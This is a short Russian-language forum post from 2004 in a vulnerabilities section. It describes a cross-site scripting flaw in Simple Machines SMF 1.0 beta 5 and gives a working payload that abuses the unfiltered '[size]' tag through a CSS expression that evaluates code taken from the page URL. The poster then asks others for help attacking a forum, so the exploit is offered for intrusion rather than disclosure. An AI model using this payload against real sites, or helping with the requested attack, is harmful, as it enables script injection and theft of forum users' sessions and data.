Форумы Уязвимость в Simple machines smf 1.0 beta 5 public

Discussion in 'Уязвимости CMS/форумов' started by Nemirof, 23 Oct 2004.

  1. Nemirof

    Nemirof New Member

    Joined:
    23 Oct 2004
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Уязвимость обнаружена в Simple Machines SMF. Удаленный пользователь может выполнить XSS нападение.

    SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример:

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[size=expression(eval(unescape(document.URL.substring(document.URL.
    length-41,document.URL.length))))]Big Exploit[/size][/QUOTE]<span id='postcolor'>

    если кому не лень помогите мне с этим форумом разобраться,а то я уже весь мозг напряг [​IMG] но так ничего и не придумал